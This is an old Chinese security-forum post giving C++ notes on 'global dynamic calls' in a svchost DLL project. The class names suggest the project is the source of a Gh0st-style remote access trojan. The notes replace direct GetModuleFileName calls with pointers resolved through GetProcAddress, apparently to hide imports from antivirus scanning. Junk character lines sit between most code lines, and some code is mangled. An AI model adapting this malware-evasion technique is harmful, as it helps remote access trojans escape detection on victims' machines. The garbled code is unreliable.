标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
) |# [+ J) N- {# \
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
$ p% d% c8 _$ Z ^4 c
----------------------------------------
4 B3 H+ C6 `' F
DTDY.h:
$ s' f& k; x) C8 o+ F* d+ Q0 A
8 H+ `% S2 B4 @4 o$ R$ j
#if _MSC_VER>1000
& L' e* Q. j* H% V0 _7 \7 ?
#pragma once
A9 _+ \8 ~* R
#endif //_MSC_VER>1000
0 l |* p: w. H- e* m0 h; U! x
#include<windows.h>
: o y3 J1 _% Y; x; r
' C" U3 k! Q7 k" s2 E
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
* w! H$ g: w4 V3 g' v0 Q
class DTDY
' S: g' V, X* |$ o7 f. S! t2 r
{
. f, V# p& H% }- B0 l
public:
# Z/ L m8 o" u+ ~# A9 r
DTDY();
% _( G) ^* w! }' H0 @ S1 ?; E9 X; H
virtual ~DTDY();
+ v) y) ~1 a0 O' {% }. [
public:
/ D4 T' A* w4 g9 O% y5 b4 r) D
static pGetModuleFileNameA MyGetModuleFileName;
0 s1 }5 o, @( q# q' _6 P3 I
static BOOL FunInitiallization();
t2 O# \# I, S" W' ?6 i! q
};
' Y8 E8 V! D, s' w$ D( V
#endif
$ n4 z, j( x2 H
----------------------------------------
1 |' H) V/ H& q, h9 \3 m
. x. x* U" G: H/ H
DTDY.cpp:
( u( n# J7 y+ O- K* l5 @* _9 Q% b
* ]* {1 F3 W$ N. X# `' [. o f
#include "DTDY.h"
! P0 W: S5 v. C$ i. j. Y
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
/ S& X: L' O; X0 m7 T. G
DTDY:TDY()
& U* D4 S8 h& |: H1 y) b
{
2 T7 a6 ?1 [5 r2 T) `# M% o# k3 @1 d
}
- m6 `8 n1 @( X2 s" e
DTDY::~DTDY()
( L3 k8 X2 \, ?$ p, r
{
1 c4 u" \, J7 c1 X
}
! c. [* O2 `' h# W' W0 h
BOOL DTDY::FunInitiallization()
+ f# y" j1 ?; T( M' ^6 L
{
' N" R. i- J$ R1 ~8 q
HMODULE hModule=LoadLibrary("kernel32.dll");
/ I- L3 |2 t) }0 G" A# m/ \ F% y
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
7 W1 @ w( @& l. h1 M$ x7 }
if(!MyGetModuleFileName=) return FALSE;
, n, s# h$ ^, Z3 _5 ]. ]* u
+ m; O3 |: f% |2 g" S
return TRUE;
. |4 j% [* C' |: T
}
: v. J5 b/ M2 s! Q0 c& a8 b
----------------------------------------
$ F" O) c# F0 c2 i/ N& n) \4 u8 ?, \
svchost.cpp:
4 C% \! J9 W6 M. N3 T3 s% W5 w
* r& U8 O7 |" k& j& `* x6 T9 @% u
#include "DTDY.h"
* b8 ~! x6 {$ A0 B- [, |
, x* G- X6 U' d9 N9 A
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
& m' C. ?" R; s! s6 n" E! ^
{
" f4 k! X% @; X
switch(ul_reason_for_call)
& I+ J n* B0 o( i0 e; k0 h& q
{
/ p) ]5 v/ p# k" {/ I1 Y& Z
case DLL_PROCESS_ATTACH:
/ E- v7 ^$ H* a- @& D+ r$ r- d
if(!DTDY::FunInitiallization()) return FALSE;
; K' V: n) h3 a* r& K; b4 ^' y2 z4 q
+ r/ M7 o& |2 {6 E5 v% f
break;
8 P( T: {; l u! F
}
" L" g( C1 n4 b+ f! f" ?; ^
}
* X' p. }" X. g2 d. m
& S6 P$ q" g% Z, g- L# X
" A( x! g* I _( y! W& g _, ^ N
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
: ?+ x$ F9 Q; U4 j" Y; R
改写为
# x; s& c; O* F4 X# ^- L5 I
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
8 G N8 t& N% I$ @
----------------------------------------
) R, Q* {+ {. `- |7 ^6 D2 c" K. z
KernelManager.cpp:
0 q- k# t2 b1 T! r
7 b: P C/ [/ G' B: f
#include "../DTDY.h"
9 u. ~9 K& G+ V! E3 B5 X
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
x; j0 S5 f4 z1 x: Z ]! l/ m
改写为
+ h5 W3 i' J. S! C* }; y( _
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
% b# s, \- M2 O+ R1 ^+ y
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
